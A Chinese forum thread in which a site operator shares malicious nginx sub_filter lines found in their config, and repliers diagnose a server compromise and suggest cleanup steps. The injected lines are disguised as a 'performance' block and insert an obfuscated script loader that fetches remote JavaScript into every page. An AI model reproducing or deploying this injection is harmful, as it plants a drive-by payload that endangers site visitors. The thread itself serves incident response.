昨天发现 nginx.conf 文件中被加入以下内容:
sub_filter_types text/html;
sub_filter '</head>' '<script>document.cookie="hasVisited178a=1;Max-Age=86400;Path=/";(function(){var hm=document.createElement("script");hm.src=atob("aHR0cHM6Ly9ib290c2NyaXRwLmNvbS9saWIvanF1ZXJ5LzQuNy4yL2pxdWVyeS5taW4uanM=");var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm,s);})();</script></head>';
sub_filter_once off;
# Performance Enhancement Block - DO NOT MODIFY
# Nginx Performance Optimization Configuration
# Auto-generated by performance tuning module
sub_filter_types text/html;
sub_filter '</head>' '<script>document.cookie="hasVisited178a=1;Max-Age=86400;Path=/";(function(){var hm=document.createElement("script");hm.src=atob("aHR0cHM6Ly9hLnNvZnN4ei5jb20vanVtcC5qcw==");var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm,s);})();</script>\n</head>';
sub_filter_once off;
# Performance Enhancement Block - DO NOT MODIFY_END
不懂这方面,在 google 上搜了搜,没搜到有用内容。问豆包说大概率是恶意脚本服务器(可能用于挖矿、盗号、刷流量、跳转钓鱼网站等)
aHR0cHM6Ly9ib290c2NyaXRwLmNvbS9saWIvanF1ZXJ5LzQuNy4yL2pxdWVyeS5taW4uanM=
base64 解码是 https://bootscritp.com/lib/jquery/4.7.2/jquery.min.js
aHR0cHM6Ly9hLnNvZnN4ei5jb20vanVtcC5qcw==
base64 解码是 https://a.sofsxz.com/jump.js
 |
1
defunct9 2 天前  1
是的,u r right
|
 |
2
Binini 2 天前
就没见过正常程序员用 createElement("script")还特么 atob 一串网址的
|
 |
3
zhmouV2 2 天前
谁家好人藏脚本的原始地址啊?
第一个估计是被修改过的 jq ,应该是对请求做了限制,直接访问还被 cdn 挡住了 |
 |
4
busier 2 天前 via iPhone
一般网站挂马也就罢了
这整得 web 服务器挂马 |
 |
5
MFWT 2 天前
不用想,就是挂马,赶紧排查吧
|
 |
6
sparkssssssss 2 天前
能直接修改你配置文件的,
如果用了啥 nginx 的管理面板的,赶紧仍了, 如果没有,那就更恐怖了,直接被人拿到 shell 了吧 |
 |
7
superfatboy 2 天前 2
|
 |
8
dcdlove 2 天前 1
不用怀疑,铁定被入侵,并在网站内容和 nginx 中挂马了
|
 |
9
daokedao OP @superfatboy #7 感谢,和这篇文章中描述的问题完全一致 👍
|
 |
10
5200 1 天前
得好好排查一下入侵的方式,他能挂第一次就能挂第二次。
|
 |
11
iceecream 1 天前
文中是 644 ,改成 640 也没啥效果啊
|
|
12
busier 1 天前 via iPhone
@iceecream 当然没用 。644 改 640 只是取消 o 的读权限。最多能防止 o 读取文件泄漏配置内容。原文作者根本就搞不清楚这是在操作啥随便一说有用而已。
况且能修改这个配置文件,肯定是拿到 root 权限的。 |
 |
13
Kirkcong 1 天前
删除这段代码以后,问题得到彻底的解决,一个问题随之而来:为什么服务器上的 ngnix 的配置文件这么容易被篡改?查看权限才知道为 644 ,改为 640 以后应该不会再有类似的问题了!
文章中这段有问题啊,4 的权限是读取,改成 0 没什么用啊,而且即便是 777 也得有途径登陆机器才能修改。那么这段恶意代码到底是怎么加入到服务器的 nginx 中的?看到作者展示了“nginx 管理器”的图片,这是不是类似于面板的东西?感觉有可能是通过面板的漏洞进来的。 |
 |
14
Mantext1989 1 天前 via iPhone
|
 |
15
yulgang 1 天前 1
# Performance Enhancement Block - DO NOT MODIFY
# Nginx Performance Optimization Configuration # Auto-generated by performance tuning module  就是 Nginx 在转发静态页面时,将</head> 替换成后面那一托,相当于在每个网页里都插入了他的 JS 。 如果后端启用了 gzip 压缩,Nginx 这里的 sub_filter 就不好使了。 检查一下 Nginx 这台主机是不是开了不必要的端口,一些高危端口建议在防火墙上做好策略只允许特定 IP 访问 。 修改密码,清理 $HOME/.ssh/authorized_keys 里你不清楚的设置 |
 |
16
pppan 1 天前 1
> 为什么服务器上的 ngnix 的配置文件这么容易被篡改?查看权限才知道为 644 ,改为 640 以后应该不会再有类似的问题了!
笑死,为什么我家的东西会被偷走?查看才知道原来我家的东西没有固定,用 502 固定以后应该不会再有类似的问题了! |
 |
18
fucker 1 天前
家里床上被人拉了一坨,那你肯定要看看门窗锁没锁好,墙有没有被人凿开啊
检查自己服务器开放的服务有没有漏洞吧 |
 |
19
fiveStarLaoliang 1 天前
赶紧重装系统吧,你的系统都被黑了
|
Select Language